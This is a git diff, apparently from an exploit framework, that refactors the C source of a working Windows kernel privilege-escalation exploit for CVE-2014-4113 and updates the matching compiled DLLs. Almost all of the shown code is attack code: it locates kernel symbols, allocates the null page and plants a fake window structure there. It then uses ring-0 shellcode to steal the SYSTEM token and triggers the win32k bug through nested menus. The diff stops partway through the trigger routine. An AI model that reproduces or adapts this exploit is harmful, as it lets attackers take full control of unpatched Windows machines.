diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
index cc1dc87d63..7fea19cac3 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll differ
diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
index 7f5fc4240b..6edd668351 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll differ
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113.sln b/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
index 62c99261f9..4e51163178 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
@@ -1,9 +1,9 @@
 
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Express 2013 for Windows Desktop
-VisualStudioVersion = 12.0.30723.0
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -13,14 +13,14 @@ Global
 		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
-		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
+		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
index b9cafa1a06..72d02dfdb1 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -2,6 +2,9 @@
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
 #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
+// Uncomment this line to enable to debug output
+//#define DEBUGGING
+
 // Purloined from ntstatus.h
 #define STATUS_SUCCESS                          ((NTSTATUS)0x00000000L) // ntsubauth
 
@@ -9,23 +12,17 @@
 #include <windows.h>
 #undef WIN32_NO_STATUS
 
+#ifdef DEBUGGING
+// only needed because of the output printf stuff when debugging
+#include <stdio.h>
+#endif
+
 #ifndef _NTDEF_
 typedef __success(return >= 0) LONG NTSTATUS;
 typedef NTSTATUS *PNTSTATUS;
 #endif
 
-#define DEBUGGING FALSE
-
-#ifdef _M_X64
-typedef unsigned __int64 QWORD;
-typedef QWORD *PQWORD;
-#endif
-
-int WndProcClue = 0;
-int HookCallbackClue = 0;
-WNDPROC lpPrevWndFunc;
-DWORD MyProcessId = 0;
-DWORD OffsetWindows = 0;
+#define PTR_SIZE sizeof(UINT_PTR)
 
 typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 	IN  HANDLE  ProcessHandle,
@@ -34,21 +31,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 	IN  PSIZE_T RegionSize,
 	IN  ULONG   AllocationType,
 	IN  ULONG   Protect
-	);
+);
 
 typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 	IN   HANDLE ProcessId,
 	OUT  PVOID Process
-	);
+);
 
 typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
 	_In_       DWORD SystemInformationClass,
 	_Inout_    PVOID SystemInformation,
 	_In_       ULONG SystemInformationLength,
 	_Out_opt_  PULONG ReturnLength
-	);
+);
 
-typedef struct _SYSTEM_MODULE {
+typedef struct _SYSTEM_MODULE
+{
 	HANDLE               Reserved1;
 	PVOID                Reserved2;
 	PVOID                ImageBaseAddress;
@@ -61,44 +59,60 @@ typedef struct _SYSTEM_MODULE {
 	BYTE                 Name[256];
 } SYSTEM_MODULE, *PSYSTEM_MODULE;
 
-
-typedef struct _SYSTEM_MODULE_INFORMATION {
+typedef struct _SYSTEM_MODULE_INFORMATION
+{
 	ULONG                ModulesCount;
 	SYSTEM_MODULE        Modules[0];
 } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 
+BOOL bWndProcFlag = FALSE;
+BOOL bHookCallbackFlag = FALSE;
+
+WNDPROC lpPrevWndFunc;
+DWORD dwMyProcessId = 0;
+DWORD dwOffsetWindows = 0;
+
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
 
+#ifdef DEBUGGING
+void dprintf(char* pszFormat, ...)
+{
+	char s_acBuf[2048];
+	va_list args;
+	va_start(args, pszFormat);
+	vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
+	OutputDebugString(s_acBuf);
+	va_end(args);
+}
+#else
+#define dprintf(...)
+#endif
 
-long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
+long CALLBACK hook_callback_two(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
 {
 	EndMenu();
 	return -5;
 }
 
-LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
-#ifdef _M_X64
-	if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
-#else
-	if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
-#endif
+LRESULT CALLBACK hook_callback(int code, WPARAM wParam, LPARAM lParam)
+{
+	if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
 	{
-		HookCallbackClue = 1;
-		if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
-#ifdef _M_X64
-			lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
-#else
-			lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
-#endif
+		bHookCallbackFlag = TRUE;
+		if (UnhookWindowsHook(WH_CALLWNDPROC, hook_callback))
+		{
+			lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);
 		}
 	}
 	return CallNextHookEx(0, code, wParam, lParam);
 }
 
-LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
-	if (msg == 289 && WndProcClue != 1) {
-		WndProcClue = 1;
+LRESULT CALLBACK wnd_proc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
+{
+	if (msg == 289 && !bWndProcFlag)
+	{
+		bWndProcFlag = TRUE;
 		PostMessageA(hwnd, 256, 40, 0);
 		PostMessageA(hwnd, 256, 39, 0);
 		PostMessageA(hwnd, 513, 0, 0);
@@ -106,380 +120,375 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
 	return DefWindowProc(hwnd, msg, wParam, lParam);
 }
 
+DWORD_PTR __stdcall get_threadinfo_ptr(void)
+{
 #ifdef _M_X64
-QWORD MyPtiCurrent(void) {
-	void *teb = (void *)__readgsqword(0x30);
-	QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
-
-	return Win32ThreadInfo;
-}
+	PBYTE pTeb = (PBYTE)__readgsqword(0x30);
+	return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x78));
 #else
-DWORD __stdcall MyPtiCurrent() {
-	__asm {
-		mov eax, fs : 18h
-			mov eax, [eax + 40h]
-	}
-}
+	PBYTE pTeb = (PBYTE)__readfsdword(0x18);
+	return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x40));
 #endif
+}
 
-int _stdcall shellcode_ring0(int one, int two, int three, int four) {
+int _stdcall shellcode_ring0(int one, int two, int three, int four)
+{
 	void *my_process_info = NULL;
 	void *system_info = NULL;
 
-	pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
+	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
 	pPsLookupProcessByProcessId((HANDLE)4, &system_info);
 
-	*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
+	*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
 
 	return 0;
 }
 
-void
-LogMessage(char* pszFormat, ...) {
-	if (DEBUGGING != TRUE) {
-		return;
-	}
-	static char s_acBuf[2048];
-	va_list args;
-	va_start(args, pszFormat);
-	vsprintf(s_acBuf, pszFormat, args);
-	printf("%s\n", s_acBuf);
-	OutputDebugString(s_acBuf);
-	va_end(args);
-}
-
-DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
 	VOID(*lpCode)() = (VOID(*)())lpPayload;
 	lpCode();
 	return ERROR_SUCCESS;
 }
 
-void Win32kNullPage(LPVOID lpPayload) {
-	HWND hWnd;
-	WNDCLASSA WndClass;
-	LPBYTE promise_land = NULL;
-	HMODULE hNtdll = NULL;
-	HMODULE ntkrnl = NULL;
-	NTSTATUS status;
-	PULONG pSystemInfoBuffer = NULL;
-	lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
-	ULONG    SystemInfoBufferSize = 0;
-	char nt_name[256];
-	PVOID nt_base;
-	OSVERSIONINFOA VersionInformation;
+void win32k_null_page(LPVOID lpPayload)
+{
+	WNDCLASSA wndClass;
+	char szNtName[256];
+	PVOID pNtBase;
+	OSVERSIONINFOA versionInfo;
 
 	// Getting Windows version
-	LogMessage("[*] Getting Windows version...");
-	memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
-	VersionInformation.dwOSVersionInfoSize = 148;
-	if (!GetVersionExA(&VersionInformation)) {
-		LogMessage("[!] Failed to get windows version");
+	dprintf("[*] Getting Windows version...");
+	memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
+	versionInfo.dwOSVersionInfoSize = 148;
+
+	if (!GetVersionExA(&versionInfo))
+	{
+		dprintf("[!] Failed to get windows version");
 		return;
 	}
 
 #ifdef _M_X64
-	if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
-		LogMessage("[*] Windows 6.1 found...");
-		OffsetWindows = 0x208;
+	if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+	{
+		// Ex: Windows 7 SP1
+		dprintf("[*] Windows 6.1 found...");
+		dwOffsetWindows = 0x208;
 	}
 #else
-	if (VersionInformation.dwMajorVersion == 6) {
-		if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
-			LogMessage("[*] Windows 6.1 found...");
-			OffsetWindows = 0xf8;
+	if (versionInfo.dwMajorVersion == 6)
+	{
+		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+		{
+			// Ex: Windows 7 SP1
+			dprintf("[*] Windows 6.1 found...");
+			dwOffsetWindows = 0xf8;
 		}
-		else if (!VersionInformation.dwMinorVersion) {
-			LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
-			OffsetWindows = 0xe0;
+		else if (!versionInfo.dwMinorVersion)
+		{
+			// Ex: Windows 2008 R2
+			dprintf("[*] Windows 6.0 found...");
+			dwOffsetWindows = 0xe0;
 		}
-		else {
-			LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
+		else
+		{
+			dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
 			return;
 		}
 	}
-	else if (VersionInformation.dwMajorVersion == 5) {
-		if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
-			LogMessage("[*] Windows 5.1 found...");
-			OffsetWindows = 0xc8;
+	else if (versionInfo.dwMajorVersion == 5)
+	{
+		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+		{
+			// Ex: Windows XP SP3
+			dprintf("[*] Windows 5.1 found...");
+			dwOffsetWindows = 0xc8;
 		}
-		else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
-			LogMessage("[*] Windows 5.2 found...");
-			OffsetWindows = 0xd8;
+		else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
+		{
+			// Ex: Windows 2003 SP2
+			dprintf("[*] Windows 5.2 found...");
+			dwOffsetWindows = 0xd8;
 		}
-		else {
-			LogMessage("[!] Unsupported Windows 5  found, only 5.1 and 5.2 supported atm");
+		else
+		{
+			dprintf("[!] Unsupported Windows 5  found, only 5.1 and 5.2 supported atm");
 			return;
 		}
 	}
 #endif
-	else {
-		LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
+	else
+	{
+		dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
 		return;
 	}
 
 	// Solve symbols
-	LogMessage("[*] Solving symbols...");
+	dprintf("[*] Solving symbols...");
 
-	hNtdll = LoadLibraryA("ntdll");
-	if (hNtdll == NULL) {
-		LogMessage("[!] Failed to Load ntdll...");
+	HMODULE hNtdll = LoadLibraryA("ntdll");
+	if (hNtdll == NULL)
+	{
+		dprintf("[!] Failed to Load ntdll...");
 		return;
 	}
 
-	pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
-	if (pZwQuerySystemInformation == NULL) {
-		LogMessage("[!] Failed to solve ZwQuerySystemInformation");
+	lZwQuerySystemInformation pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+	if (pZwQuerySystemInformation == NULL)
+	{
+		dprintf("[!] Failed to solve ZwQuerySystemInformation");
 		return;
 	}
 
 	pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
-	if (pNtAllocateVirtualMemory == NULL) {
-		LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
+	if (pNtAllocateVirtualMemory == NULL)
+	{
+		dprintf("[!] Failed to solve NtAllocateVirtualMemory");
 		return;
 	}
 
-	LogMessage("[*] Requesting Kernel loaded modules...");
+	dprintf("[*] Requesting Kernel loaded modules...");
 
-	status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
-
-	if (SystemInfoBufferSize == 0) {
-		LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
-		return;
-	}
-	else {
-		LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
-	}
-
-	pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
-	if (pSystemInfoBuffer == NULL) {
-		LogMessage("[!] Allocation for SystemInfo failed");
+	ULONG ulSystemInfoBufferSize = 0;
+	pZwQuerySystemInformation(11, &ulSystemInfoBufferSize, 0, &ulSystemInfoBufferSize);
+	if (ulSystemInfoBufferSize == 0)
+	{
+		dprintf("[!] Requesting pZwQuerySystemInformation required length failed");
 		return;
 	}
 
-	status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
+	dprintf("[*] pZwQuerySystemInformation required length %d", ulSystemInfoBufferSize);
 
-	if (status != STATUS_SUCCESS) {
-		LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
+	PULONG pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize);
+	if (pSystemInfoBuffer == NULL)
+	{
+		dprintf("[!] Allocation for SystemInfo failed");
 		return;
 	}
 
+	if (pZwQuerySystemInformation(11, pSystemInfoBuffer, ulSystemInfoBufferSize, &ulSystemInfoBufferSize) != STATUS_SUCCESS)
+	{
+		dprintf("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
+		return;
+	}
 
-	LogMessage("[*] Parsing SYSTEM_INFO...");
+	dprintf("[*] Parsing SYSTEM_INFO...");
 
 	SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
 
-	LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
+	dprintf("[*] %d Kernel modules found", smi->ModulesCount);
 
-	memset(nt_name, 0, 256);
+	memset(szNtName, 0, 256);
 
-	int i = 0;
-	while (i < smi->ModulesCount) {
+	ULONG i = 0;
+	while (i < smi->ModulesCount)
+	{
 		SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
-		LogMessage("[*] Checking module %s", sm->Name);
-		if (strstr((char *)sm->Name, ".exe")) {
+		dprintf("[*] Checking module %s", sm->Name);
+		if (strstr((char *)sm->Name, ".exe"))
+		{
 			char *start = strstr((char *)sm->Name, "nt");
-			if (start != NULL) {
-				nt_base = sm->ImageBaseAddress;
-				strncpy_s(nt_name, 256, start, _TRUNCATE);
+			if (start != NULL)
+			{
+				pNtBase = sm->ImageBaseAddress;
+				strncpy_s(szNtName, 256, start, _TRUNCATE);
 				break;
 			}
 		}
 		i++;
 	}
 
-	if (nt_name == NULL) {
-		LogMessage("[!] nt not found");
+	if (szNtName == NULL)
+	{
+		dprintf("[!] nt not found");
 		return;
 	}
-	else {
-		LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
-	}
+	dprintf("[*] Good! nt found as %s at 0x%08x", szNtName, pNtBase);
 
-	ntkrnl = LoadLibraryA(nt_name);
+	HMODULE hNtKrnl = LoadLibraryA(szNtName);
 
-	LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
+	dprintf("[*] %s loaded in userspace at: %08x", szNtName, hNtKrnl);
 
-	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
+	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(hNtKrnl, "PsLookupProcessByProcessId");
 
-	if (pPsLookupProcessByProcessId == NULL) {
-		LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
+	if (pPsLookupProcessByProcessId == NULL)
+	{
+		dprintf("[!] Failed to solve PsLookupProcessByProcessId");
 		return;
 	}
 
-#ifdef _M_X64
-	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
-	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
-#else
-	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
-	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
-#endif
+	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
+	dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
 
-	MyProcessId = GetCurrentProcessId();
+	dwMyProcessId = GetCurrentProcessId();
 
 	// Register Class
-	LogMessage("[*] Registering class...");
+	dprintf("[*] Registering class...");
 
-	memset(&WndClass, 0, sizeof(WNDCLASSA));
-	WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
-	WndClass.lpszClassName = "woqunimalegebi";
+	memset(&wndClass, 0, sizeof(WNDCLASSA));
+	wndClass.lpfnWndProc = wnd_proc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
+	wndClass.lpszClassName = "woqunimalegebi";
 
-	if (RegisterClassA(&WndClass) == 0) {
-		LogMessage("[!] RegisterClassA failed ");
+	if (!RegisterClassA(&wndClass))
+	{
+		dprintf("[!] RegisterClassA failed ");
 		return;
 	}
 
 	// Create Window
-	LogMessage("[*] Creating window...");
-	hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
+	dprintf("[*] Creating window...");
+	HWND hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
 
-	if (hWnd == NULL) {
-		LogMessage("[!] CreateWindowExA failed");
+	if (hWnd == NULL)
+	{
+		dprintf("[!] CreateWindowExA failed");
 		return;
 	}
 
 	// Making everything ready for exploitation...
 
-	LogMessage("[*] Allocating null page...");
+	dprintf("[*] Allocating null page...");
 #ifdef _M_X64
-	ULONGLONG base_address = 0x00000000fffffffb;
+	ULONGLONG dwBaseAddress = 0x00000000fffffffb;
 #else
-	DWORD base_address = 1;
+	DWORD dwBaseAddress = 1;
 #endif
-	SIZE_T region_size = 0x1000;
-	ULONG zero_bits = 0;
-	HANDLE current_process = NULL;
 
-	current_process = GetCurrentProcess();
+	SIZE_T sRegionSize = 0x1000;
+	ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
 
-	if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
-		LogMessage("[!] Failed to allocate null page");
+	if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
+	{
+		dprintf("[!] Failed to allocate null page");
 		return;
 	}
 
-	LogMessage("[*] Getting PtiCurrent...");
+	dprintf("[*] Getting PtiCurrent...");
 
-#ifdef _M_X64
-	ULONGLONG pti = MyPtiCurrent();
-#else
-	DWORD pti = MyPtiCurrent();
-#endif
+	DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
 
-	if (pti == 0) {
+	if (dwThreadInfoPtr == 0)
+	{
 		LoadLibrary("user32.dll");
 		LoadLibrary("gdi32.dll");
-		pti = MyPtiCurrent();
+		dwThreadInfoPtr = get_threadinfo_ptr();
 	}
 
-	if (pti == 0) {
-		LogMessage("[!] Filed to get PtiCurrent");
+	if (dwThreadInfoPtr == 0)
+	{
+		dprintf("[!] Filed to get current thread information");
 		return;
 	}
-	else {
-#ifdef _M_X64
-		LogMessage("[*] Good! pti 0x%016llx", pti);
-#else
-		LogMessage("[*] Good! pti 0x%08x", pti);
-#endif
-	}
 
-	LogMessage("[*] Creating a fake structure at NULL...");
+	dprintf("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
+	dprintf("[*] Creating a fake structure at NULL...");
 
+	LPVOID lpPtr = NULL;
 #ifdef _M_X64
-	void *test = NULL;
-	(QWORD)test = 0x10000000B;
-	*((PQWORD)test) = pti;
+	(DWORD_PTR)lpPtr = 0x10000000B;
+	*((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
 
 	/* win32k!tagWND->bServerSideWindowProc = TRUE */
-	(QWORD)test = 0x100000025;
-	*((PBYTE)test) = 4;
+	(DWORD_PTR)lpPtr = 0x100000025;
+	*((PBYTE)lpPtr) = 4;
 
 	/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
-	(QWORD)test = 0x10000008B;
-	*((PQWORD)test) = &shellcode_ring0;
+	(DWORD_PTR)lpPtr = 0x10000008B;
+	*((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
 #else
-	void *test = promise_land + 3;
+	LPBYTE lpPromisedLand = NULL;
+	lpPtr = lpPromisedLand + 3;
 	/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
 	.text:BF8B93F4 02C mov     edi, _gptiCurrent
 	.text:BF8B93FA 02C cmp     edi, [esi + 8];
 	.text:BF8B93FD 02C jz      loc_BF8B
 	*/
-	*(LPDWORD)test = pti;
+	*(LPDWORD)lpPtr = dwThreadInfoPtr;
 
-	*((LPBYTE)(promise_land + 0x11)) = 0x4;
+	*((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
 
-	test = promise_land + 0x5b;
-	*(LPDWORD)test = (DWORD)shellcode_ring0;
+	lpPtr = lpPromisedLand + 0x5b;
+	*(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
 #endif
 
 	// Exploit!
 
-	LogMessage("[*] Triggering vulnerability...");
-	HMENU MenuOne = CreatePopupMenu();
-	if (MenuOne == NULL) {
-		LogMessage("[!] First CreatePopupMenu failed");
+	dprintf("[*] Triggering vulnerability...");
+	HMENU hMenuOne = CreatePopupMenu();
+	if (hMenuOne == NULL)
+	{
+		dprintf("[!] First CreatePopupMenu failed");
 		return;
 	}
 
-	MENUITEMINFOA MenuOneInfo;
-	memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
-	MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuOneInfo.fMask = MIIM_STRING;
+	MENUITEMINFOA menuOneInfo;
+	memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
+	menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
+	menuOneInfo.fMask = MIIM_STRING;
 
-	if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
-		LogMessage("[!] First InsertMenuItemA failed");
-		DestroyMenu(MenuOne);
+	if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
+	{
+		dprintf("[!] First InsertMenuItemA failed");
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
-	HMENU MenuTwo = CreatePopupMenu();
-	if (MenuTwo == NULL) {
-		LogMessage("[!] Second CreatePopupMenu failed");
-		DestroyMenu(MenuOne);
+	HMENU hMenuTwo = CreatePopupMenu();
+	if (hMenuTwo == NULL)
+	{
+		dprintf("[!] Second CreatePopupMenu failed");
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
-	MENUITEMINFOA MenuTwoInfo;
-	memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
-	MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
-	MenuTwoInfo.dwTypeData = "";
-	MenuTwoInfo.cch = 1;
-	MenuTwoInfo.hSubMenu = MenuOne;
-	if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
-		LogMessage("[!] Second InsertMenuItemA failed");
-		DestroyMenu(MenuTwo);
-		DestroyMenu(MenuOne);
+	MENUITEMINFOA menuTwoInfo;
+	memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
+	menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
+	menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
+	menuTwoInfo.dwTypeData = "";
+	menuTwoInfo.cch = 1;
+	menuTwoInfo.hSubMenu = hMenuOne;
+
+	if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
+	{
+		dprintf("[!] Second InsertMenuItemA failed");
+		DestroyMenu(hMenuTwo);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
